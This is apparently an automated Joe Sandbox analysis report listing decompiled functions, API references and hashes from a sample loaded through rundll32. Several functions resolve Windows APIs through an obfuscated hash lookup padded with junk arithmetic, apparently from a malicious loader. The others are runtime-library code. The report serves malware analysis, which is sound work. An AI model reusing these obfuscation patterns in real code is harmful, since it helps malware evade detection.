Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction ID: e87e1bac75f9c46fc66be9f70f9a8a28e7f0d75fdbebaedb1d1c5d1f5bc6a8a6
Opcode Fuzzy Hash: 3a224a1f1f04e7e62542cf44cd4d6c34aff0542209651b92aeebe781e589c52f
Instruction Fuzzy Hash: 644158745052989BEB61CA14DDC4BEB7BFDEB15304FA044ACFACA87082D235AF498B10

Uniqueness

Uniqueness Score: -1.00%

Function 00262959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00262959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0026602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002707A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0026295f
0x00262964
0x00262967
0x0026296a
0x0026296d
0x0026296e
0x0026296f
0x00262977
0x00262985
0x0026298a
0x00262992
0x0026299a
0x002629a2
0x002629a9
0x002629b0
0x002629b7
0x002629bb
0x002629cf
0x002629dc
0x002629e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002629DC

Strings

<^, xrefs: 00262977

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 6d9a063f7ea6605d4a656c69f5146aac6d64d78e71d7ffdec781d4f17466abe7
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: C9016D72A00108BFEB18DF95DC4A8DFBFB6EF44310F108098F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0026C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0026C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0026602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002707A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0026c6e1
0x0026c6e6
0x0026c6f0
0x0026c6fc
0x0026c703
0x0026c706
0x0026c70d
0x0026c711
0x0026c715
0x0026c71c
0x0026c723
0x0026c72a
0x0026c731
0x0026c738
0x0026c751
0x0026c762
0x0026c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0026C762

Strings

/O, xrefs: 0026C6E6

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 9eafb53852c98c4aba7087d8b425b2dc95f86566a6b195a773cb5418ec8fd585
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: D01133B290122DBBCB25DF95DC898EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00261000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00261000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0026602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002707A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00261006
0x00261009
0x0026100c
0x00261011
0x00261016
0x0026101d
0x00261026
0x0026102d
0x00261034
0x0026103b
0x00261047
0x0026104f
0x00261057
0x0026105e
0x00261065
0x0026106c
0x00261073
0x00261077
0x0026108b
0x00261096
0x0026109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00261096

Strings

[, xrefs: 0026103B

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: a6aafd67ac359982971a89c6656b5d9b115ca9250fe597342efecc921f64e71d
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: E5015BB6D01308FBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91

Uniqueness

Uniqueness Score: -1.00%

Function 00264859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00264859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002707A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0026485e
0x0026487a
0x0026487d
0x00264884
0x0026488b
0x00264892
0x0026489d
0x002648a0
0x002648ad
0x002648b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 002648B7

Strings

[, xrefs: 0026488B

Memory Dump Source

Source File: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.2109231175.0000000000260000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2109341127.000000000027C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 513f1c2211b9f4615fea5d8a768133cedf2d37b0ef30595692cf4e26653409db
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 39F017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B54

Uniqueness

Uniqueness Score: -1.00%

Function 1002A310, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002A310(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				int _t7;
				intOrPtr* _t11;

				_t11 = E10029D17(0x12, "InitializeCriticalSectionEx", 0x10045994, 0x1004599c);
				if(_t11 == 0) {
					_t7 = InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
					return _t7;
				}
				 *0x1004223c(_a4, _a8, _a12);
				return  *_t11();
			}

0x1002a32c
0x1002a333
0x1002a350
0x00000000
0x1002a350
0x1002a340
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?), ref: 1002A350

Strings

InitializeCriticalSectionEx, xrefs: 1002A320

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction ID: 89e2b04c8fbb43218a6618a6d479a3faddb58d8543dff9c8057a59943af156c2
Opcode Fuzzy Hash: c29a7883f4539586945b36bb1f00055c7dd39741731306cf3fc9d944f25f1b99
Instruction Fuzzy Hash: FAE09A32900228B7CB12AF50DC08CDE7F25EF053A1BA08020FE0C99222CB728D20ABC4

Uniqueness

Uniqueness Score: -1.00%

Function 1002A047, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002A047(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t7;

				_t2 = E10029D17(3, "FlsAlloc", 0x10045828, 0x10045830); // executed
				_t7 = _t2;
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x1004223c(_a4);
				return  *_t7();
			}

0x1002a05e
0x1002a063
0x1002a06a
0x00000000
0x1002a07b
0x1002a071
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 1002A07B

Strings

FlsAlloc, xrefs: 1002A057

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction ID: e297e765f5911ce58cd0a3eb98764831447a74d013a8c1969b92fd57f96cda80
Opcode Fuzzy Hash: 5c722b4938ba971166e469df948cf8ca82532ba69aa15712d9b066e3c7964253
Instruction Fuzzy Hash: BAE0C23254023477D311A2A06C44DCE7E44DFA27A2BA00034FF08E2111DF661C5185DD

Uniqueness

Uniqueness Score: -1.00%

Function 100283B2, Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E100283B2(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __edi;
				void* __ebp;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t89 = __edx;
				_t51 =  *0x1004d054; // 0xda1f8931
				_v8 = _t51 ^ _t97;
				_t96 = _a8;
				_t78 = E10027EC5(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E10027F5C(_t96);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0x1004d5b0)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0x1004e524 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											E100050F0(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t96 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t96 + _t88 + 0x19) =  *(_t96 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t76 = _t96 + 0x1a;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t96 + 0x21c)) = E10027E81( *(_t96 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t96 + 4) = 0xfde9;
										 *((intOrPtr*)(_t96 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t96 + 0x18)) = _t92;
										 *((short*)(_t96 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t96 + 8)) = _t92;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E10027FC1(_t90, _t96); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					E100050F0(_t92, _t96 + 0x18, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0x1004d5c0;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0x1004d5a8; // 0x8040201
										 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t78;
					 *((intOrPtr*)(_t96 + 8)) = 1;
					 *((intOrPtr*)(_t96 + 0x21c)) = E10027E81(_t78);
					_t85 = _t96 + 0xc;
					_t90 = _v36 + 0x1004d5b4;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E100037EA(_t55, _v8 ^ _t97, _t89);
			}

0x100283b2
0x100283ba
0x100283c1
0x100283c6
0x100283d2
0x100283d7
0x1002858d
0x1002858e
0x00000000
0x100283dd
0x100283dd
0x100283df
0x100283e1
0x100283e3
0x100283e6
0x100283f2
0x100283f3
0x100283f6
0x100283fe
0x00000000
0x10028400
0x10028406
0x100284dd
0x100284dd
0x1002840c
0x10028410
0x10028418
0x00000000
0x1002841e
0x10028425
0x10028452
0x10028458
0x1002845a
0x100284d1
0x100284d7
0x00000000
0x00000000
0x00000000
0x00000000
0x1002845c
0x10028466
0x1002846e
0x10028471
0x10028475
0x1002847b
0x1002847d
0x10028481
0x10028484
0x10028486
0x10028486
0x10028489
0x1002848b
0x00000000
0x00000000
0x1002848d
0x10028490
0x1002849b
0x1002849b
0x1002849d
0x00000000
0x00000000
0x10028495
0x1002849a
0x1002849a
0x1002849a
0x1002849f
0x100284a2
0x100284a5
0x00000000
0x00000000
0x00000000
0x100284a5
0x10028486
0x100284a7
0x100284a7
0x100284aa
0x100284af
0x100284af
0x100284b2
0x100284b3
0x100284b3
0x100284b3
0x100284c2
0x100284cb
0x100284cb
0x00000000
0x1002847b
0x10028427
0x10028427
0x1002842a
0x10028430
0x10028433
0x10028437
0x10028437
0x1002843f
0x10028440
0x10028441
0x10028442
0x10028443
0x10028593
0x10028593
0x10028595
0x10028425
0x10028418
0x10028406
0x00000000
0x100283fe
0x100284ef
0x100284f7
0x100284f7
0x100284fb
0x100284fe
0x10028504
0x10028507
0x10028507
0x1002850a
0x1002850c
0x1002850e
0x1002850e
0x10028511
0x10028513
0x00000000
0x00000000
0x10028515
0x10028518
0x10028534
0x10028534
0x10028536
0x00000000
0x00000000
0x1002851d
0x10028523
0x10028525
0x1002852b
0x1002852f
0x1002852f
0x10028530
0x00000000
0x10028530
0x00000000
0x10028523
0x10028538
0x1002853b
0x1002853e
0x00000000
0x00000000
0x00000000
0x1002853e
0x10028540
0x10028540
0x10028543
0x10028544
0x10028547
0x1002854a
0x1002854a
0x10028550
0x10028553
0x10028562
0x1002856b
0x10028570
0x10028576
0x10028577
0x10028577
0x1002857a
0x1002857d
0x10028580
0x10028583
0x10028583
0x10028583
0x00000000
0x10028588
0x10028596
0x100285a4

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

IsValidCodePage.KERNEL32(-00000030,00000000,75FF016A,?,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520), ref: 10028410
GetCPInfo.KERNEL32(00000000,100281A3,?,?,100281A3,?,00000000,?,?,?,?,?,?,1004E520,10010887), ref: 10028452

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction ID: 1292c3733ea5ef0b459f7b4b9d6145809bbcf0ab6f8e350e1ac26d0884e01cb9
Opcode Fuzzy Hash: af854a28b99d946c68302d2f227090b7555cb399ba289a87278f2c3e4cfc777a
Instruction Fuzzy Hash: E6513578A017568FDB20DF75E8406ABBBE5EF41344F90806FE086CB251E734EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10028141, Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10028141(void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t61;
				signed int _t62;
				char _t65;
				void* _t73;
				void* _t79;
				signed int _t84;
				void* _t91;

				_t91 = __eflags;
				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E10028255(__edx);
				_t37 = E10027EC5(_t91, _a4);
				_t65 = _a12;
				_v16 = _t37;
				_t6 = _t65 + 0x48; // 0x75ff016a
				if(_t37 !=  *((intOrPtr*)( *_t6 + 4))) {
					_push(_t61);
					_t79 = E10024214(0x220);
					_t62 = _t61 | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t9 = _a12 + 0x48; // 0x75ff016a
						_t79 = memcpy(_t79,  *_t9, 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E100283B2(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E10024DD3();
							}
							asm("lock xadd [eax], ebx");
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x1004d180;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0x1004d180) {
									_t17 = _t56 + 0x48; // 0x75ff016a
									E100268B3( *_t17);
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0x1004d780; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E10027D21(__eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x1004d174 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E1002449E(__eflags))) = 0x16;
							goto L5;
						}
					}
					E100268B3(_t79);
					return _t84;
				} else {
					return 0;
				}
			}

0x10028141
0x10028141
0x10028149
0x1002814c
0x1002814f
0x10028157
0x1002815c
0x10028162
0x10028165
0x1002816b
0x10028171
0x1002817e
0x10028180
0x10028184
0x10028186
0x100281b6
0x100281b6
0x10028188
0x10028190
0x10028195
0x1002819b
0x1002819e
0x100281a3
0x100281a7
0x100281a9
0x100281c6
0x100281ca
0x100281cc
0x100281cc
0x100281d7
0x100281db
0x100281dc
0x100281de
0x100281e1
0x100281e8
0x100281ea
0x100281ed
0x100281f2
0x100281e8
0x100281f3
0x100281f9
0x100281fe
0x10028200
0x10028206
0x1002820b
0x10028211
0x10028216
0x10028221
0x10028224
0x10028225
0x10028228
0x1002822e
0x10028232
0x10028236
0x10028237
0x1002823c
0x10028240
0x1002824b
0x1002824b
0x10028240
0x100281ab
0x100281b0
0x00000000
0x100281b0
0x100281a9
0x100281b9
0x100281c5
0x1002816d
0x10028170
0x10028170

APIs

Part of subcall function 10027EC5: GetOEMCP.KERNEL32(00000000,1002815C,?,10010887,1004E520,1004E520,10010887), ref: 10027EF0

_free.LIBCMT ref: 100281B9

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction ID: b54d8657c3404ae1227455dc142fa3ead591e73700c1e05800aa58c25d242379
Opcode Fuzzy Hash: b6c1b75cf25582137791295a8fb0e9fc90189f29a5ca7fb7a3f68677a9a9983f
Instruction Fuzzy Hash: 1531A379900249AFDB01DFA8E840A9E77F8FF44354F51016AF915DB2A1EB31AE11CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002B89A, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002B89A(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x1004e844; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x1004e844 = _t9;
				}
				_t10 = E10026850(_t9, 4); // executed
				 *0x1004e848 = _t10;
				E100268B3(0);
				if( *0x1004e848 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x1004d6d8;
					do {
						_t1 = _t31 + 0x20; // 0x1004d6f8
						E1002A310(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x1004e848; // 0x0
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x1004e628 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x1004d780;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x1004e844 = _t30;
					 *0x1004e848 = E10026850(_t30, 4);
					_t21 = E100268B3(0);
					if( *0x1004e848 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x1002b89a
0x1002b8a2
0x1002b8a5
0x1002b8ae
0x1002b8b0
0x1002b8b2
0x00000000
0x1002b8b2
0x1002b8a7
0x1002b8a7
0x1002b8b4
0x1002b8b4
0x1002b8b4
0x1002b8bc
0x1002b8c3
0x1002b8c8
0x1002b8d7
0x1002b904
0x1002b905
0x1002b905
0x1002b907
0x1002b90c
0x1002b913
0x1002b917
0x1002b91c
0x1002b926
0x1002b938
0x1002b93c
0x1002b93f
0x1002b94a
0x1002b94a
0x1002b941
0x1002b941
0x1002b944
0x00000000
0x1002b946
0x1002b946
0x1002b948
0x00000000
0x00000000
0x1002b948
0x1002b944
0x1002b951
0x1002b954
0x1002b955
0x1002b955
0x1002b95e
0x1002b961
0x1002b8d9
0x1002b8dc
0x1002b8e9
0x1002b8ee
0x1002b8fd
0x00000000
0x1002b8ff
0x1002b903
0x1002b903
0x1002b8fd

APIs

_free.LIBCMT ref: 1002B8C8
_free.LIBCMT ref: 1002B8EE

Memory Dump Source

